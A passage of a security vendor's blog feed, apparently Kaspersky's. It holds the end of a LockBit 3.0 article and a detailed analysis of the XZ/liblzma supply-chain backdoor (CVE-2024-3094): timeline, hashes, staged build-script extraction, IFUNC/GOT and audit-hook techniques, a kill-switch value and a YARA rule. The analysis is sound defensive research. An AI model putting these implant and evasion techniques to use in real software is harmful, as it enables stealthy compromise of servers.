  899. <td>Remote Services</td>
  900. <td><a href="" target="_blank" rel="noopener">T0886</a></td>
  901. </tr>
  902. <tr>
  903. <td>Discovery</td>
  904. <td>Network Service Discovery</td>
  905. <td><a href="" target="_blank" rel="noopener">T1046</a></td>
  906. </tr>
  907. <tr>
  908. <td>Defense evasion</td>
  909. <td>Clear Windows Event Logs</td>
  910. <td><a href="" target="_blank" rel="noopener">T1070.001</a></td>
  911. </tr>
  912. <tr>
  913. <td>Defense evasion</td>
  914. <td>Impair Defenses</td>
  915. <td><a href="" target="_blank" rel="noopener">T1562</a></td>
  916. </tr>
  917. </tbody>
  918. </table>
  919. <h2 id="preventive-actions-against-ransomware-attacks">Preventive actions against ransomware attacks</h2>
  920. <p>Ransomware attacks can be devastating, especially if the attackers manage to get hold of high-privileged credentials. Measures for mitigating the risk of such an attack may vary depending on the technology used by the company. However, there are certain infrastructure-agnostic techniques:</p>
  921. <ul>
  922. <li>Using a robust, properly-configured antimalware solution, such as <a href="" target="_blank" rel="noopener">Kaspersky Endpoint Security</a></li>
  923. <li>Implementing <a href="" target="_blank" rel="noopener">Managed Detection and Response (MDR)</a> to proactively seek out threats</li>
  924. <li>Disabling unused services and ports to minimize the attack surface</li>
  925. <li>Keeping all systems and software up to date</li>
  926. <li>Conducting regular penetration tests and vulnerability scanning to identify vulnerabilities and promptly apply appropriate countermeasures</li>
  927. <li>Adopting regular cybersecurity training, so that employees are aware of cyberthreats and ways to avoid them</li>
  928. <li>Making backups frequently and testing them</li>
  929. </ul>
  930. <h2 id="conclusion">Conclusion</h2>
  931. <p>Our examination of the LockBit 3.0 builder files shows the alarming simplicity with which attackers can craft customized ransomware, as evidenced by a recent incident where adversaries exploited administrator credentials to deploy a tailored ransomware variant. This underscores the need for robust security measures capable of mitigating this kind of threat effectively, as well as adoption of a cybersecurity culture among employees.</p>
  932. <p>Kaspersky products detect the threat with the following verdicts:</p>
  933. <ul>
  934. <li>Trojan-Ransom.Win32.Lockbit.gen</li>
  935. <li>Trojan.Multi.Crypmod.gen</li>
  936. <li>Trojan-Ransom.Win32.Generic</li>
  937. </ul>
  938. <p>And the SessionGopher script, as:</p>
  939. <ul>
  940. <li>HackTool.PowerShell.Agent.l</li>
  941. <li></li>
  942. </ul>
  943. ]]></content:encoded>
  944. <wfw:commentRss></wfw:commentRss>
  945. <slash:comments>0</slash:comments>
  946. <media:content xmlns:media="" url="" width="1200" height="646"><media:keywords>full</media:keywords></media:content>
  947. <media:content xmlns:media="" url="" width="1024" height="551"><media:keywords>large</media:keywords></media:content>
  948. <media:content xmlns:media="" url="" width="300" height="162"><media:keywords>medium</media:keywords></media:content>
  949. <media:content xmlns:media="" url="" width="150" height="150"><media:keywords>thumbnail</media:keywords></media:content>
  950. </item>
  951. <item>
  952. <title>XZ backdoor story &#8211; Initial analysis</title>
  953. <link></link>
  954. <comments></comments>
  955. <dc:creator><![CDATA[GReAT]]></dc:creator>
  956. <pubDate>Fri, 12 Apr 2024 08:00:34 +0000</pubDate>
  957. <category><![CDATA[Incidents]]></category>
  958. <category><![CDATA[Backdoor]]></category>
  959. <category><![CDATA[Cyber espionage]]></category>
  960. <category><![CDATA[Linux]]></category>
  961. <category><![CDATA[Malware]]></category>
  962. <category><![CDATA[Malware Descriptions]]></category>
  963. <category><![CDATA[Malware Technologies]]></category>
  964. <category><![CDATA[SSH]]></category>
  965. <category><![CDATA[XZ]]></category>
  966. <category><![CDATA[Unix and macOS malware]]></category>
  967. <guid isPermaLink="false"></guid>
  969. <description><![CDATA[Kaspersky analysis of the backdoor recently found in XZ, which is used in many popular Linux distributions and in OpenSSH server process.]]></description>
  970. <content:encoded><![CDATA[<p><img width="990" height="400" src="" class="attachment-securelist-huge-promo size-securelist-huge-promo wp-post-image" alt="" decoding="async" loading="lazy" /></p><p>On March 29, 2024, a single <a href="" target="_blank" rel="noopener">message</a> on the Openwall OSS-security mailing list marked an important discovery for the information security, open source and Linux communities: the discovery of a malicious backdoor in <strong>XZ</strong>. <strong>XZ </strong>is a compression utility integrated into many popular distributions of Linux.</p>
  971. <p>The particular danger of the backdoored library lies in its use by the OpenSSH server process <strong>sshd</strong>. On several systemd-based distributions, including Ubuntu, Debian and RedHat/Fedora Linux, OpenSSH is patched to use systemd features, and as a result has a dependency on this library (note that Arch Linux and Gentoo are unaffected). The ultimate goal of the attackers was most likely to introduce a remote code execution capability to <strong>sshd</strong> that no one else could use.</p>
  972. <p>Unlike other supply chain attacks we have seen in Node.js, <a href="" target="_blank" rel="noopener">PyPI</a>, <a href="" target="_blank" rel="noopener">FDroid</a>, and the Linux <a href="" target="_blank" rel="noopener">Kernel</a> that mostly consisted of atomic malicious patches, fake packages and typosquatted package names, this incident was a multi-stage operation that almost succeeded in compromising SSH servers on a global scale.</p>
  973. <p>The backdoor in the liblzma library was introduced at two levels. The source code of the build infrastructure that generated the final packages was slightly modified (by introducing an additional file <strong>build-to-host.m4</strong>) to extract the next stage script that was hidden in a test case file (<strong>bad-3-corrupt_lzma2.xz</strong>). These scripts in turn extracted a malicious binary component from another test case file (<strong>good-large_compressed.lzma</strong>) that was linked with the legitimate library during the compilation process to be shipped to Linux repositories. Major vendors in turn shipped the malicious component in beta and experimental builds. The compromise of XZ Utils is assigned <a href="" target="_blank" rel="noopener">CVE-2024–3094</a> with the maximum severity score of 10.</p>
  974. <h2 id="the-timeline-of-events">The timeline of events</h2>
  975. <p>2024.01.19 XZ website moved to GitHub pages by a new maintainer (<a href="" target="_blank" rel="noopener">jiaT75</a>)<br />
  976. 2024.02.15 &#8220;build-to-host.m4&#8221; is <a href=";a=commitdiff;h=4323bc3e0c1e1d2037d5e670a3bf6633e8a3031e" target="_blank" rel="noopener">added</a> to .gitignore<br />
  977. 2024.02.23 two &#8220;test files&#8221; that contained the stages of the malicious script are <a href=";a=commit;h=cf44e4b7f5dfdbf8c78aef377c10f71e274f63c0" target="_blank" rel="noopener">introduced</a><br />
  978. <u>2024.02.24 XZ 5.6.0 is released</u><br />
  979. 2024.02.26 <a href=";a=commitdiff;h=328c52da8a2bbb81307644efdb58db2c422d9ba7" target="_blank" rel="noopener">commit</a> in CMakeLists.txt that sabotages the <a href="" target="_blank" rel="noopener">Landlock</a> security feature<br />
  980. 2024.03.04 the backdoor leads to <a href="" target="_blank" rel="noopener">issues</a> with Valgrind<br />
  981. 2024.03.09 two &#8220;test files&#8221; are updated, CRC functions are modified, Valgrind issue is &#8220;fixed&#8221;<br />
  982. <u>2024.03.09 XZ 5.6.1 is released</u><br />
  983. 2024.03.28 bug is discovered, Debian and RedHat notified<br />
  984. 2024.03.28 Debian <a href="" target="_blank" rel="noopener">rolls back</a> XZ 5.6.1 to 5.4.5-0.2 version<br />
  985. 2024.03.29 an email is <a href="" target="_blank" rel="noopener">published</a> on the OSS-security mailing list<br />
  986. 2024.03.29 RedHat confirms backdoored XZ was <a href="" target="_blank" rel="noopener">shipped</a> in Fedora Rawhide and Fedora Linux 40 beta<br />
  987. 2024.03.30 Debian <a href="" target="_blank" rel="noopener">shuts down</a> builds and starts process to rebuild it<br />
  988. 2024.04.02 XZ main developer <a href="" target="_blank" rel="noopener">recognizes </a>the backdoor incident</p>
  989. <h2 id="backdoored-source-distributions">Backdoored source distributions</h2>
  990. <p><strong>xz-5.6.0</strong></p>
  991. <table width="100%">
  992. <tbody>
  993. <tr>
  994. <td width="15%"><strong>MD5</strong></td>
  995. <td width="85%"><a href=";utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">c518d573a716b2b2bc2413e6c9b5dbde</a></td>
  996. </tr>
  997. <tr>
  998. <td><strong>SHA1</strong></td>
  999. <td>e7bbec6f99b6b06c46420d4b6e5b6daa86948d3b</td>
  1000. </tr>
  1001. <tr>
  1002. <td><strong>SHA256</strong></td>
  1003. <td>0f5c81f14171b74fcc9777d302304d964e63ffc2d7b634ef023a7249d9b5d875</td>
  1004. </tr>
  1005. </tbody>
  1006. </table>
  1007. <p><strong>xz-5.6.1</strong></p>
  1008. <table width="100%">
  1009. <tbody>
  1010. <tr>
  1011. <td width="15%"><strong>MD5</strong></td>
  1012. <td width="85%"><a href=";utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">5aeddab53ee2cbd694f901a080f84bf1</a></td>
  1013. </tr>
  1014. <tr>
  1015. <td><strong>SHA1</strong></td>
  1016. <td>675fd58f48dba5eceaf8bfc259d0ea1aab7ad0a7</td>
  1017. </tr>
  1018. <tr>
  1019. <td><strong>SHA256</strong></td>
  1020. <td>2398f4a8e53345325f44bdd9f0cc7401bd9025d736c6d43b372f4dea77bf75b8</td>
  1021. </tr>
  1022. </tbody>
  1023. </table>
  1024. <h2 id="initial-infection-analysis">Initial infection analysis</h2>
  1025. <p>The XZ git repository contains a set of test files that are used when testing the compressor/decompressor code to verify that it&#8217;s working properly. The account named Jia Tan or &#8220;<a href="" target="_blank" rel="noopener">jiaT75</a>&#8220;, <a href="" target="_blank" rel="noopener">committed</a> two test files that initially appeared harmless, but served as the bootstrap to implant backdoor.</p>
  1026. <p>The associated files were:</p>
  1027. <ul>
  1028. <li><strong>bad-3-corrupt_lzma2.xz</strong> (<a href=";utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">86fc2c94f8fa3938e3261d0b9eb4836be289f8ae</a>)</li>
  1029. <li><strong>good-large_compressed.lzma</strong> (<a href=";utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">50941ad9fd99db6fca5debc3c89b3e899a9527d7</a>)</li>
  1030. </ul>
  1031. <p>These files were intended to contain shell scripts and the backdoor binary object itself. However, they were hidden within the malformed data, and the attacker knew how to properly extract them when needed.</p>
  1032. <h3>Stage 1 &#8211; The modified <strong>build-to-host</strong> script</h3>
  1033. <p>When the XZ release is ready, the official Github repository distributes the project&#8217;s source files. Initially, these releases on the repository, aside from containing the malicious test files, were harmless because they don&#8217;t get the chance to execute. However, the attacker appears to have only added the malicious code that bootstrap the infection when the releases were sourced from <strong>https://xz[.]</strong>, which was under the control of Jia Tan.</p>
  1034. <p>This URL is used by most distributions, and, when downloaded, it comes with a file named <strong>build-to-host.m4</strong> that contains malicious code.</p>
  1035. <p><strong>build-to-host.m4 </strong>(<a href=";utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">c86c8f8a69c07fbec8dd650c6604bf0c9876261f</a>) is executed during the build process and executes a line of code that fixes and decompresses the first file added to the tests folder:</p>
  1036. <div id="attachment_112357" style="width: 1034px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112357" class="size-large wp-image-112357" src="" alt="Deobfuscated line of code in build-to-host.m4" width="1024" height="167" srcset=" 1024w, 300w, 768w, 740w, 800w, 1246w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112357" class="wp-caption-text">Deobfuscated line of code in build-to-host.m4</p></div>
  1037. <p>This line of code replaces the &#8220;broken&#8221; data from <strong>bad-3-corrupt_lzma2.xz</strong> using the <strong>tr</strong> command, and pipes the output to the <strong>xz -d</strong> command, which decompresses the data. The decompressed data contains a shell script that will be executed later using <strong>/bin/bash</strong>, triggered by this <strong>.m4</strong> file.</p>
  1038. <h3 id="stage-2-the-injected-shell-script">Stage 2 &#8211; The injected shell script</h3>
  1039. <p>The malicious script injected by the malicious <strong>.m4</strong> file verifies that it&#8217;s running on a Linux machine and also that it&#8217;s running inside the intended build process.</p>
  1040. <div id="attachment_112358" style="width: 1034px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112358" class="size-large wp-image-112358" src="" alt="Injected script contents" width="1024" height="229" srcset=" 1024w, 300w, 768w, 1536w, 1568w, 740w, 1255w, 800w, 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112358" class="wp-caption-text">Injected script contents</p></div>
  1041. <p>To execute the next stage, it uses <strong>good-large_compressed.lzma</strong>, which is indeed compressed correctly with XZ, but contains junk data inside the decompressed data.</p>
  1042. <p>The junk data removal procedure is as follows: the <strong>eval</strong> function executes the head pipeline, with each <strong>head</strong> command either ignoring the next 1024 bytes or extracting the next 2048 or 724 bytes.</p>
  1043. <p>In total, these commands extracted <strong>33,492 </strong>bytes (<strong>2048*16 + 724 </strong>bytes). The <strong>tail</strong> command then retains the final <strong>31,265 </strong>bytes of the file and ignores the rest.</p>
  1044. <p>Then, the <strong>tr</strong> command applies a basic substitution to the output to deobfuscate it. The second XZ command decompresses the transformed bytes as a raw <strong>lzma </strong>stream, after which the result is piped into shell.</p>
  1045. <h3 id="stage-3-backdoor-extraction">Stage 3 &#8211; Backdoor extraction</h3>
  1046. <p>The last stage shell script performs many checks to ensure that it is running in the expected environment, such as whether the project is configured to use <a href="" target="_blank" rel="noopener">IFUNC</a> (which will be discussed in the next sections).</p>
  1047. <p><a href="" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-large wp-image-112359" src="" alt="" width="1024" height="83" srcset=" 1024w, 300w, 768w, 740w, 800w, 1110w" sizes="(max-width: 1024px) 100vw, 1024px" /></a></p>
  1048. <p>Many of the other checks performed by this stage include determining whether GCC is used for compilation or if the project contains specific files that will be used by the script later on.</p>
  1049. <p>In this stage, it extracts the backdoor binary code itself, an <a href="" target="_blank" rel="noopener">object file</a> that is currently hidden in the same <strong>good-large_compressed.lzma</strong> file, but at a different offset.</p>
  1050. <p>The following code handles this:</p>
  1051. <div id="attachment_112360" style="width: 1034px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112360" class="size-large wp-image-112360" src="" alt="Partial command used by the last script stage" width="1024" height="160" srcset=" 1024w, 300w, 768w, 740w, 800w, 1392w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112360" class="wp-caption-text">Partial command used by the last script stage</p></div>
  1052. <p>The extraction process operates through a sequence of commands, with the result of each command serving as the input for the next one. The formatted one-liner code is shown below:</p>
  1053. <div id="attachment_112361" style="width: 1034px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112361" class="size-large wp-image-112361" src="" alt="Formatted backdoor extraction one-liner" width="1024" height="742" srcset=" 1024w, 300w, 768w, 483w, 740w, 387w, 800w, 1397w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112361" class="wp-caption-text">Formatted backdoor extraction one-liner</p></div>
  1054. <p>Initially, the file <strong>good-large_compressed.lzma</strong> is extracted using the <strong>XZ</strong> tool itself. The subsequent steps involve calling a chain of <strong>head</strong> calls with the &#8220;<strong>eval $i&#8221;</strong> function (same as the stage 3 extraction).</p>
  1055. <p>Then a custom RC4-like algorithm is used to decrypt the binary data, which contains another compressed file. This compressed file is also extracted using the XZ utility. The script then removes some bytes from the beginning of the decompressed data using predefined values and saves the result to disk as <strong>liblzma_la-crc64-fast.o</strong>, which is the backdoor file used in the linking process.</p>
  1056. <p>Finally, the script modifies the function <strong>is_arch_extension_supported</strong> from the <strong>crc_x86_clmul.h</strong> file in <strong>liblzma</strong>, to replace the call to the <strong>__get_cpuid</strong> function with <strong>_get_cpuid</strong>, removing one underscore character.</p>
  1057. <p>This modification allows it to be linked into the library (we&#8217;ll discuss this in more detail in the next section). The whole build infection chain can be summarized in the following scheme:</p>
  1058. <p><a href="" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-large wp-image-112362" src="" alt="" width="1024" height="531" srcset=" 1024w, 300w, 768w, 1536w, 675w, 740w, 540w, 800w, 1645w" sizes="(max-width: 1024px) 100vw, 1024px" /></a></p>
  1059. <h2 id="binary-backdoor-analysis">Binary backdoor analysis</h2>
  1060. <h3 id="a-stealth-loading-scenario">A stealth loading scenario</h3>
  1061. <p>In the original XZ code, there are two special functions used to calculate the CRC of the given data: <strong>lzma_crc32 </strong>and <strong>lzma_crc64</strong>. Both of these functions are stored in the ELF symbol table with type <a href="" target="_blank" rel="noopener">IFUNC</a>, a feature provided by the GNU C Library (GLIBC). IFUNC allows developers to dynamically select the correct function to use. This selection takes place when the dynamic linker loads the shared library.</p>
  1062. <p>The reason XZ uses this is that it allows for determining whether an optimized version of the <strong>lzma_crcX </strong>function should be used or not. The optimized version requires special features from modern processors (CLMUL, SSSE3, SSE4.1). These special features need to be verified by issuing the <strong>cpuid </strong>instruction, which is called using the <a href="" target="_blank" rel="noopener"><strong>__get_cpuid</strong></a> wrapper/intrinsic provided by GLIBC, and it&#8217;s at this point the backdoor takes advantage to load itself.</p>
  1063. <p>The backdoor is stored as an object file, and its primary goal is to be linked to the main executable during compilation. The object file contains the <strong>_get_cpuid</strong> symbol, as the injected shell scripts remove one underscore symbol from the original source code, which means that when the code calls <strong>_get_cpuid</strong>, it actually calls the backdoor&#8217;s version of it.</p>
  1064. <div id="attachment_112363" style="width: 1034px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112363" class="size-large wp-image-112363" src="" alt="Backdoor code entry point" width="1024" height="392" srcset=" 1024w, 300w, 768w, 915w, 740w, 732w, 800w, 1302w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112363" class="wp-caption-text">Backdoor code entry point</p></div>
  1065. <h3 id="backdoor-code-analysis">Backdoor code analysis</h3>
  1066. <p>The initial backdoor code is invoked twice, as both <strong>lzma_crc32</strong> and <strong>lzma_crc64</strong> use the same modified function (<strong>_get_cpuid</strong>). To ensure control over this, a simple counter is created to verify that the code has already been executed. The actual malicious activity starts when the <strong>lzma_crc64</strong> IFUNC invokes <strong>_get_cpuid</strong>, sees the counter value 1 indicating that that the function has already been accessed, and initiates one final step to redirect to the true entry point of this malware.</p>
  1067. <div id="attachment_112364" style="width: 864px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112364" class="size-large wp-image-112364" src="" alt="Backdoor initialization" width="854" height="1024" srcset=" 854w, 250w, 768w, 168w, 292w, 740w, 233w, 751w, 964w" sizes="(max-width: 854px) 100vw, 854px" /></a><p id="caption-attachment-112364" class="wp-caption-text">Backdoor initialization</p></div>
  1068. <p>To initialize the malicious code, the backdoor first initializes a couple of structures that hold core information about the current running process. Primarily, it locates the Global Offset Table (<a href="">GOT</a>) address using hardcoded offsets, and uses this information to find the <strong>cpuid</strong> pointer inside it.</p>
  1069. <div id="attachment_112365" style="width: 1034px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112365" class="size-large wp-image-112365" src="" alt="GOT modification code" width="1024" height="381" srcset=" 1024w, 300w, 768w, 1536w, 940w, 740w, 752w, 800w, 1678w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112365" class="wp-caption-text">GOT modification code</p></div>
  1070. <p>The GOT contains the offsets of symbols, including the <strong>cpuid</strong> wrapper. The backdoor then swaps the pointers to the main malware function, and calls it as if it were calling <strong>cpuid</strong>.</p>
  1071. <h3 id="core-behavior">Core behavior</h3>
  1072. <p>The main goal of the backdoor is to successfully hook specific functions that will allow it to monitor every connection to the infected machine. The targeted functions include:</p>
  1073. <table width="100%">
  1074. <tbody>
  1075. <tr>
  1076. <td width="30%"><strong>Targeted function</strong></td>
  1077. <td width="70%"><strong>Description</strong></td>
  1078. </tr>
  1079. <tr>
  1080. <td><strong>RSA_public_decrypt</strong></td>
  1081. <td>Used by <strong>libcrypto</strong> to decrypt a ciphertext signed by a private key</td>
  1082. </tr>
  1083. <tr>
  1084. <td><strong>EVP_PKEY_set1_RSA</strong></td>
  1085. <td>Used by <strong>libcrypto</strong> to set the RSA key of a given context</td>
  1086. </tr>
  1087. <tr>
  1088. <td><strong>RSA_get0_key</strong></td>
  1089. <td>Used by <strong>libcrypto</strong> to retrieve an RSA key</td>
  1090. </tr>
  1091. </tbody>
  1092. </table>
  1093. <p>However, hooking all these functions is not a simple and straightforward task for the backdoor. It involves accessing many internal structures and manipulating process-specific structures until it achieves its goal, and it also needs to be as stealthy as possible, which means that the malicious code contains multiple checks to avoid being analyzed.</p>
  1094. <h3 id="execution-environment-check">Execution environment check</h3>
  1095. <p>It first parses <strong>ld-linux</strong> (dynamic linker), which is primarily responsible for dynamically resolving symbol addresses in memory. It also extracts various information about the environment and verifies that the current process the backdoor is running in matches its execution criteria, which are:</p>
  1096. <ul>
  1097. <li>The current process is <strong>/usr/bin/sshd</strong></li>
  1098. <li>Check if the kill switch is present</li>
  1099. </ul>
  1100. <p>It extracts the name of the current process from <strong>argv[0]</strong> and also parses all the process environment variables to see if any of them are present in its internal string table. If a match is found, or the process is not <strong>sshd</strong>, the malware halts its execution.</p>
  1101. <div id="attachment_112366" style="width: 1034px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112366" class="size-large wp-image-112366" src="" alt="Process environment check" width="1024" height="864" srcset=" 1024w, 300w, 768w, 415w, 740w, 332w, 800w, 1299w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112366" class="wp-caption-text">Process environment check</p></div>
  1102. <p>The only variable inside its own table is <strong>yolAbejyiejuvnup=Evjtgvsh5okmkAvj</strong>, which in this context serves as a <strong>kill switch</strong>.</p>
  1103. <h3 id="the-trie-structure">The trie structure</h3>
  1104. <p>One of the distinctive features of the backdoor is the use of a single <a href="" target="_blank" rel="noopener">trie</a> structure for string operations. Instead of directly comparing strings or using string hashes to match a particular constant (for example, the name of a library function), the code performs a trie lookup, and checks if the result is equal to a certain constant number. For example, the magic value for the ELF header results in the trie returning <strong>0x300</strong>, and the name of the <strong>system</strong> function is matched with a return value of <strong>0x9F8</strong>. Trie is not just used for comparisons: certain functions that use pointers to strings (for example, <strong>ssh-2.0</strong>) search for these strings in the host binary using the trie, so there will be no suspicious data in the backdoor&#8217;s body.</p>
  1105. <p>The implementation of the trie uses 16-byte bitmasks, each half corresponding to the byte input ranges <strong>0x00-0x3F</strong> and <strong>0x40-0x7F</strong>, and 2-byte trie leaf nodes, 3 bits of which are flags (direction, termination) and the rest is reserved for the value (or the location of the next node).</p>
  1106. <div id="attachment_112367" style="width: 658px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112367" class="size-full wp-image-112367" src="" alt="Part of the trie lookup function that performs the bitmap match" width="648" height="275" srcset=" 648w, 300w" sizes="(max-width: 648px) 100vw, 648px" /></a><p id="caption-attachment-112367" class="wp-caption-text">Part of the trie lookup function that performs the bitmap match</p></div>
  1107. <h3 id="symbol-resolver">Symbol resolver</h3>
  1108. <p>There are at least three symbol resolver-related routines used by the backdoor to locate the ELF Symbol structure, which holds information such as the symbol name and its offset. All symbol resolver functions receive a key to be searched in the trie.</p>
  1109. <div id="attachment_112368" style="width: 1034px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112368" class="size-large wp-image-112368" src="" alt="Symbol resolver example" width="1024" height="195" srcset=" 1024w, 300w, 768w, 740w, 800w, 1028w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112368" class="wp-caption-text">Symbol resolver example</p></div>
  1110. <p>One of the backdoor resolver functions iterates through all symbols and verifies which one has the desired key. If it is found, it returns the <strong>Elf64_Sym</strong> structure, which will later be used to populate an internal structure of the backdoor that holds all the necessary function pointers. This process is similar to that commonly seen in Windows threats with API hashing routines.</p>
  1111. <p>The backdoor searches many functions from the libcrypto (OpenSSL) library, as these will be used in later encryption routines. It also keeps track of how many functions it was able to find and resolve; this determines whether it is executing properly or should stop.</p>
  1112. <p>Another interesting symbol resolver abuses the <strong>lzma_alloc</strong> function, which is part of the liblzma library itself. This function serves as a helper for developers to allocate memory efficiently using the default allocator (malloc) or a custom one. In the case of the XZ backdoor, this function is abused to make use of a fake allocator. In reality, it functions as another symbol resolver. The parameter intended for &#8220;allocation size&#8221; is, in fact, the symbol key inside the trie. This trick is meant to complicate backdoor analysis.</p>
  1113. <div id="attachment_112369" style="width: 1007px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112369" class="size-full wp-image-112369" src="" alt="Symbol resolver using a fake allocator structure" width="997" height="98" srcset=" 997w, 300w, 768w, 990w, 740w, 800w" sizes="(max-width: 997px) 100vw, 997px" /></a><p id="caption-attachment-112369" class="wp-caption-text">Symbol resolver using a fake allocator structure</p></div>
  1114. <p>The backdoor dynamically resolves its symbols while executing; it doesn&#8217;t necessarily do so all at once or only when it needs to use them. The resolved symbols/functions range from legitimate OpenSSL functions to functions such as <strong>system</strong>, which is used to execute commands on the machine.</p>
  1115. <h3 id="the-symbind-hook">The Symbind hook</h3>
  1116. <p>As mentioned earlier, the primary objective of the backdoor initialization is to successfully hook functions. To do so, the backdoor makes use of <a href="" target="_blank" rel="noopener"><strong>rtdl-audit</strong></a>, a feature of the dynamic linker that enables the creation of custom shared libraries to be notified when certain events occur within the linker, such as symbol resolution. In a typical scenario, a developer would create a shared library following the <a href="" target="_blank" rel="noopener"><strong>rtdl-audit</strong> manual</a>. However, the XZ backdoor opts to perform a runtime patch on the already registered (default) interfaces loaded in memory, thereby hijacking the symbol-resolving routine.</p>
  1117. <div id="attachment_112370" style="width: 1034px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112370" class="size-large wp-image-112370" src="" alt="dl-audit runtime patch" width="1024" height="194" srcset=" 1024w, 300w, 768w, 740w, 800w, 1385w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112370" class="wp-caption-text">dl-audit runtime patch</p></div>
  1118. <p>The maliciously crafted structure <a href="" target="_blank" rel="noopener"><strong>audit_iface</strong></a>, stored in the <strong>dl_audit</strong> global variable within the dynamic linker&#8217;s memory area, contains the <strong>symbind64</strong> callback address, which is invoked by the dynamic linker. It sends all the symbol information to the backdoor control, which is then used to obtain a malicious address for the target functions, thus achieving hooking.</p>
  1119. <div id="attachment_112371" style="width: 1034px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112371" class="size-large wp-image-112371" src="" alt="Hooking placement inside the Symbind modified callback" width="1024" height="308" srcset=" 1024w, 300w, 768w, 740w, 932w, 800w, 1085w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112371" class="wp-caption-text">Hooking placement inside the Symbind modified callback</p></div>
  1120. <p>The addresses for <strong>dl_audit</strong> and <strong>dl_naudit</strong>, which holds the number of audit interfaces available, are obtained by disassembling both the <strong>dl_main</strong> and <strong>dl_audit_symbind_alt</strong> functions. The backdoor contains an internal minimalistic <strong>disassembler </strong>used for instruction decoding. It makes extensive use of it, especially when hunting for specific values like the <strong>*audit</strong> addresses.</p>
  1121. <div id="attachment_112372" style="width: 1034px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112372" class="size-large wp-image-112372" src="" alt="dl_naudit hunting code" width="1024" height="492" srcset=" 1024w, 300w, 768w, 728w, 740w, 582w, 800w, 1504w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112372" class="wp-caption-text">dl_naudit hunting code</p></div>
  1122. <p>The <strong>dl_naudit</strong> address is found by one of the <strong>mov </strong>instructions within the <strong>dl_main</strong> function code that accesses it. With that information, the backdoor hunts for access to a memory address and saves it.</p>
  1123. <p>It also verifies if the memory address acquired is the same address as the one accessed by the <strong>dl_audit_symbind_alt</strong> function on a given offset. This allows it to safely assume that it has indeed found the correct address. After it finds the <strong>dl_naudit </strong>address, it can easily calculate where <strong>dl_audit </strong>is, since the two are stored next to each other in memory.</p>
  1124. <h2 id="conclusion">Conclusion</h2>
  1125. <p>In this article, we covered the entire process of backdooring <strong>liblzma (XZ)</strong>, and delved into a detailed analysis of the binary backdoor code, up to achieving its principal goal: hooking.</p>
  1126. <p>It&#8217;s evident that this backdoor is highly complex and employs sophisticated methods to evade detection. These include the multi-stage implantation in the <strong>XZ</strong> repository, as well as the complex code contained within the binary itself.</p>
  1127. <p>There is still much more to explore about the backdoor&#8217;s internals, which is why we have decided to present this as <strong>Part I</strong> of the <strong>XZ</strong> backdoor series.</p>
  1128. <p>Kaspersky products detect malicious objects related to the attack as <strong>HEUR:Trojan.Script.XZ</strong> and <strong>Trojan.Shell.XZ</strong>. In addition, Kaspersky Endpoint Security for Linux detects malicious code in SSHD process memory as <strong>MEM:Trojan.Linux.XZ</strong> (as part of the Critical Areas Scan task).</p>
  1129. <h2 id="indicators-of-compromise">Indicators of compromise</h2>
  1130. <h3 id="yara-rules">Yara rules</h3>
  1131. <pre class="crayon-plain-tag">rule liblzma_get_cpuid_function {
  1132.   meta:
  1133. description = "Rule to find the malicious get_cpuid function CVE-2024-3094"
  1134.            author = "Kaspersky Lab"
  1135.   strings:
  1136.        $a = { F3 0F 1E FA 55 48 89 F5 4C 89 CE 53 89 FB 81 E7 00 00 00 80 48 83 EC 28 48 89 54 24 18 48 89 4C 24 10 4C 89 44 24 08 E8 ?? ?? ?? ?? 85 C0 74 27 39 D8 72 23 4C 8B 44 24 08 48 8B 4C 24 10 45 31 C9 48 89 EE 48 8B 54 24 18 89 DF E8 ?? ?? ?? ?? B8 01 00 00 00 EB 02 31 C0 48 83 C4 28 5B 5D C3 }  
  1137.    condition:
  1138.        $a
  1139. }</pre>
  1140. <h3 id="known-backdoored-libraries">Known backdoored libraries</h3>
  1141. <p><strong>Debian Sid</strong><br />
